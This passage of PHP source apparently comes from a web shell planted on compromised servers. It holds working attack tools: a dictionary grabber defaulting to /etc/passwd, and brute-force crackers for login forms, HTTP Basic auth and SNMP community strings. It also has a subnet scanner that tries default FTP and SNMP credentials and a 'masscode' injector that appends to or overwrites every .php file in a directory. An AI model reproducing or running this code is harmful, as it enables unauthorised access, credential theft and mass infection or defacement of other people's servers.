6777<table>Wordlist generator:<form method=\"POST\">
6778<tr>
6779<td width=\"20%\" bgcolor=\"#666666\">Range:</td>
6780<td bgcolor=\"#666666\">
6781<select name=range>
6782<option value=a>a-z</option>
6783<option value=Z>A-Z</option>
6784<option value=0>0-9</option></select>
6785</td></tr>
6786<tr>
6787<td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td>
6788<td bgcolor=\"#808080\">
6789<select name=min>
6790<option value=1>1</option>
6791<option value=2>2</option>
6792<option value=3>3</option>
6793<option value=4>4</option>
6794<option value=5>5</option>
6795<option value=6>6</option>
6796<option value=7>7</option>
6797<option value=8>8</option>
6798<option value=9>9</option>
6799<option value=10>10</option>
6800</select>
6801</td></tr>
6802<tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td>
6803<td bgcolor=\"#666666\">
6804<select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select>
6805</td></tr>
6806<tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
6807<tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr>
6808<tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table>
6809</td><td>
6810<table>Grab dictionary:
6811<form method=\"POST\">
6812<tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td>
6813<td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr>
6814<tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td>
6815<td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
6816<tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr>
6817<tr>
6818<td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form>
6819</table>
6820</td><td>
6821<table>Download dictionary:<form method=\"POST\">
6822<tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr>
6823<tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
6824<tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr>
6825<tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table>
6826</td>
6827</tr></table>
6828</center> ";}
6829}
6830
6831if ($act == "htmlform")
6832{
6833global $errorbox,$footer,$et,$hcwd;
6834if(!empty($_REQUEST['start'])){
6835$url=$_REQUEST['target'];
6836$uf=$_REQUEST['userf'];
6837$pf=$_REQUEST['passf'];
6838$sf=$_REQUEST['submitf'];
6839$sv=$_REQUEST['submitv'];
6840$method=$_REQUEST['method'];
6841$fail=$_REQUEST['fail'];
6842$dic=$_REQUEST['dictionary'];
6843$type=$_REQUEST['combo'];
6844$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
6845if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer");
6846$dictionary=fopen($dic,'r');
6847echo "<font color=blue>Cracking started...<br>";
6848while(!feof($dictionary)){
6849if($type){
6850$combo=trim(fgets($dictionary)," \n\r");
6851$user=substr($combo,0,strpos($combo,':'));
6852$pass=substr($combo,strpos($combo,':')+1);
6853}else{
6854$pass=trim(fgets($dictionary)," \n\r");
6855}
6856$url.="?$uf=$user&$pf=$pass&$sf=$sv";
6857$res=check_urL($url,$method,$fail,12);
6858if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;}
6859flusheR();
6860}
6861fclose($dictionary);
6862echo "Done!</font><br>";
6863}
6864else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
6865}
6866
6867if ($act == "basicauth")
6868{
6869global $errorbox,$et,$t,$crack,$hcwd;
6870if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
6871$data='';
6872$method=($_REQUEST['method'])?'POST':'GET';
6873if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
6874spliturL($_REQUEST['target'],$host,$page);
6875$type=$_REQUEST['combo'];
6876$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
6877if($method='GET')$page.=$data;
6878$dictionary=fopen($_REQUEST['dictionary'],'r');
6879echo "<font color=blue>";
6880while(!feof($dictionary)){
6881if($type){
6882$combo=trim(fgets($dictionary)," \n\r");
6883$user=substr($combo,0,strpos($combo,':'));
6884$pass=substr($combo,strpos($combo,':')+1);
6885}else{
6886$pass=trim(fgets($dictionary)," \n\r");
6887}
6888$so=fsockopen($host,80,$en,$es,5);
6889if(!$so){echo "$errorbox Can not connect to host$et";break;}
6890else{
6891$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
6892if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data);
6893$packet.="\r\n\r\n";
6894$packet.=$data;
6895fputs($so,$packet);
6896$res=substr(fgets($so),9,2);
6897fclose($so);
6898if($res=='20')echo "U: $user P: $pass</br>";
6899flusheR();
6900}
6901}
6902echo "Done!</font>";
6903}else echo "<center><form method=\"POST\" name=form><table><tr><td bgcolor=\"#333333\"><font color=silver>
6904HTTP Auth cracker:</font></td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
6905}
6906
6907if ($act == "snmp")
6908{
6909global $t,$et,$errorbox,$crack,$hcwd;
6910if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
6911$target=$_REQUEST['target'];
6912$dictionary=fopen($_REQUEST['dictionary'],'r');
6913if ($dictionary){
6914echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
6915while(!feof($dictionary)){
6916$com=trim(fgets($dictionary)," \n\r");
6917$res=snmpchecK($target,$com,2);
6918if($res)echo "$com<br>";
6919flusheR();
6920}
6921echo "<br>Done</font>";
6922fclose($dictionary);
6923}
6924else{
6925echo "$errorbox Can not open dictionary.$et";
6926}
6927}
6928 echo "<center><table width=\"50%\">SNMP cracker:<form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
6929}
6930
6931
6932
6933if ($act == "scanner")
6934{
6935global $hcwd;
6936if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1";
6937$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
6938if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
6939$target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0;
6940echo "<font color=yellow>Port scanning started against ".htmlspecialchars($target).":<br>";
6941$start=time();
6942for($i=$from;$i<=$to;$i++){
6943if($tcp){
6944if (checkthisporT($target,$i,$timeout)){
6945$nu++;
6946$ser="";
6947if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")";
6948echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>";
6949}
6950}
6951if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";}
6952flusheR();
6953}
6954$time=time()-$start;
6955echo "Done! ($time seconds)</font>";
6956}
6957elseif (!empty($_REQUEST['securityscanner'])){
6958echo "<font color=yellow>";
6959$start=time();
6960$from=$_REQUEST['from'];
6961$to=(int)$_REQUEST['to'];
6962$timeout=(int)$_REQUEST['timeout'];
6963$f = substr($from,strrpos($from,".")+1);
6964$from = substr($from,0,strrpos($from,"."));
6965if(!empty($_REQUEST['httpscanner'])){
6966echo "Loading webserver bug list...";
6967flusheR();
6968$buglist=whereistmP().DIRECTORY_SEPARATOR.namE();
6969$dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
6970if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>";
6971flusheR();
6972}else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";}
6973for($i=$f;$i<=$to;$i++){
6974$output=0;
6975$ip="$from.$i";
6976if(!empty($_REQUEST['nslookup'])){
6977$hn=gethostbyaddr($ip);
6978if($hn!=$ip)echo "$ip [$hn]<br>";}
6979flusheR();
6980if(!empty($_REQUEST['ipscanner'])){
6981$port=$_REQUEST['port'];
6982if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port;
6983$open=$ser="";
6984foreach($p as $po){
6985$scan=checkthisporT($ip,$po,$timeout);
6986if ($scan){
6987$ser="";
6988if($ser=getservbyport($po,"tcp"))$ser="($ser)";
6989$open.=" $po$ser ";
6990}
6991}
6992if($open){echo "$ip) Open ports:$open<br>";$output=1;}
6993flusheR();
6994}
6995if(!empty($_REQUEST['httpbanner'])){
6996$res=get_sw_namE($ip,$timeout);
6997if($res){
6998echo "$ip) Webserver software: ";
6999if($res==-1)echo "Unknow";
7000else echo $res;
7001echo "<br>";
7002$output=1;
7003}
7004flusheR();
7005}
7006if(!empty($_REQUEST['httpscanner'])){
7007if(checkthisporT($ip,80,$timeout) && !empty($file)){
7008$admin=array('/admin/','/adm/');
7009$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
7010$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
7011$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
7012foreach ($file as $v){
7013$vuln=array();
7014$v=trim($v);
7015if(!$v || $v{0}=='#')continue;
7016$v=str_replace('","','^',$v);
7017$v=str_replace('"','',$v);
7018$vuln=explode('^',$v);
7019$page=$cqich=$nukech=$adminch=$userch=$vuln[1];
7020if(strstr($page,'@CGIDIRS'))
7021foreach($cgi as $cg){
7022$cqich=str_replace('@CGIDIRS',$cg,$page);
7023$url="http://$ip$cqich";
7024$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
7025if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
7026flusheR();
7027}
7028elseif(strstr($page,'@ADMINDIRS'))
7029foreach ($admin as $cg){
7030$adminch=str_replace('@ADMINDIRS',$cg,$page);
7031$url="http://$ip$adminch";
7032$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
7033if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
7034flusheR();
7035}
7036elseif(strstr($page,'@USERS'))
7037foreach ($users as $cg){
7038$userch=str_replace('@USERS',$cg,$page);
7039$url="http://$ip$userch";
7040$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
7041if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
7042flusheR();
7043}
7044elseif(strstr($page,'@NUKE'))
7045foreach ($nuke as $cg){
7046$nukech=str_replace('@NUKE',$cg,$page);
7047$url="http://$ip$nukech";
7048$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
7049if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
7050flusheR();
7051}
7052else{
7053$url="http://$ip$page";
7054$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
7055if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
7056flusheR();
7057}
7058}
7059}
7060}
7061if(!empty($_REQUEST['smtprelay'])){
7062if(checkthisporT($ip,25,$timeout)){
7063$res='';
7064$res=checksmtP($ip,$timeout);
7065if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR();
7066}
7067}
7068if(!empty($_REQUEST['snmpscanner'])){
7069if(checkthisporT($ip,161,$timeout,1)){
7070$com=$_REQUEST['com'];
7071$coms=$res="";
7072if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;
7073foreach ($c as $v){
7074$ret=snmpchecK($ip,$v,$timeout);
7075if($ret)$coms .=" $v ";
7076}
7077if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
7078flusheR();
7079}
7080}
7081if(!empty($_REQUEST['ftpscanner'])){
7082if(checkthisporT($ip,21,$timeout)){
7083$usps=explode(',',$_REQUEST['userpass']);
7084foreach ($usps as $v){
7085$user=substr($v,0,strpos($v,':'));
7086$pass=substr($v,strpos($v,':')+1);
7087if($pass=='[BLANK]')$pass='';
7088$ftp=@ftp_connect($ip,21,$timeout);
7089if ($ftp){
7090if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";}
7091}
7092flusheR();
7093}
7094}
7095}
7096if($output)echo "<hr size=1 noshade>";
7097flusheR();
7098}
7099$time=time()-$start;
7100echo "Done! ($time seconds)</font>";
7101if(!empty($buglist))unlink($buglist);
7102}
7103else{
7104$chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
7105echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
7106$host = substr($host,0,strrpos($host,"."));
7107echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
7108}
7109}
7110
7111if ($act == "masscode")
7112{
7113if(isset($_POST['dir']) &&
7114 $_POST['dir'] != '' &&
7115 isset($_POST['filetype']) &&
7116 $_POST['filetype'] != '' &&
7117 isset($_POST['mode']) &&
7118 $_POST['mode'] != '' &&
7119 isset($_POST['message']) &&
7120 $_POST['message'] != ''
7121 )
7122 {
7123 $dir = $_POST['dir'];
7124 $filetype = $_POST['filetype'];
7125 $message = $_POST['message'];
7126
7127 $mode = "a"; //default mode
7128
7129
7130 // Modes Begin
7131
7132 if($_POST['mode'] == 'Apender')
7133 {
7134 $mode = "a";
7135 }
7136 if($_POST['mode'] == 'Overwriter')
7137 {
7138 $mode = "w";
7139 }
7140
7141 if($handle = opendir($dir))
7142 {
7143 ?>
7144 Overwritten Files :-
7145 <ul style="padding: 5px;" >
7146 <?php
7147 while(($file = readdir($handle)) !== False)
7148 {
7149 if((preg_match("/$filetype".'$'.'/', $file , $matches) != 0) && (preg_match('/'.$file.'$/', $self , $matches) != 1))
7150 {
7151 ?>
7152 <li class="file"><a href="<?php echo "$self?open=$dir$file"?>"><?php echo $file; ?></a></li>
7153 <?php
7154 echo "\n";
7155 $fd = fopen($dir.$file,$mode);
7156 if (!$fd) echo "<p><font color=red>Permission Denied</font></p>"; break;
7157 fwrite($fd,$message);
7158 }
7159 }
7160 ?>
7161 </ul>
7162 <?php
7163 }
7164 }
7165 else
7166 {
7167 ?>
7168 <table >
7169
7170 <form method='POST'>
7171 <input type="hidden" name="injector"/>
7172 <tr>
7173 <td class="title">
7174 Directory
7175 </td>
7176 <td>
7177 <input name="dir" value="<?php echo getcwd().$SEPARATOR; ?>" />
7178 </td>
7179 </tr>
7180 <tr>
7181 <td class="title">
7182 Mode
7183 </td>
7184 <td>
7185 <select style="width: 125px;" name="mode">
7186 <option value="Apender">Apender</option>
7187 <option value="Overwriter">Overwriter</option>
7188 </select>
7189 </td>
7190 </tr>
7191 <tr>
7192 <td class="title">
7193 File Type
7194 </td>
7195 <td>
7196 <input type="text" class="cmd" name="filetype" value=".php" onblur="if(this.value=='')this.value='.php';" />
7197 </td>
7198 </tr>
7199
7200
7201 <tr>
7202 <td colspan="2">
7203 <textarea name="message" cols="110" rows="10" class="cmd">I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea>
7204 </td>
7205 </tr>
7206
7207
7208 <tr>
7209 <td rowspan="2">
7210 <input style="margin : 20px; margin-left: 315px; padding : 10px; width: 100px;" type="submit" value="Inject :D"/>
7211 </td>
7212 </tr>
7213 </form>
7214 </table>
7215 <?php
7216 }
7217}
7218
7219}
7220else
7221
7222{
7223
7224 @ob_clean();
7225
7226 $images = array(
7227
7228"arrow_ltr"=>
7229
7230"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
7231
7232"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
7233
7234"back"=>
7235
7236"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
7237
7238"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
7239
7240"Wg0JADs=",
7241
7242"buffer"=>
7243
7244"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
7245
7246"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
7247
7248"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
7249
7250"change"=>
7251
7252"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
7253
7254"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
7255
7256"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
7257
7258"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
7259
7260"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
7261
7262"zMshADs=",
7263
7264"delete"=>
7265
7266"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
7267
7268"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
7269
7270"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
7271
7272"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
7273
7274"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
7275
7276"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
7277
7278"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
7279
7280"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
7281
7282"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
7283
7284"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
7285
7286"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
7287
7288"download"=>
7289
7290"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
7291
7292"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
7293
7294"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
7295
7296"forward"=>
7297
7298"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
7299
7300"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
7301
7302"WqsJADs=",
7303
7304"home"=>
7305
7306"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
7307
7308"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
7309
7310"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
7311
7312"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
7313
7314"mode"=>
7315
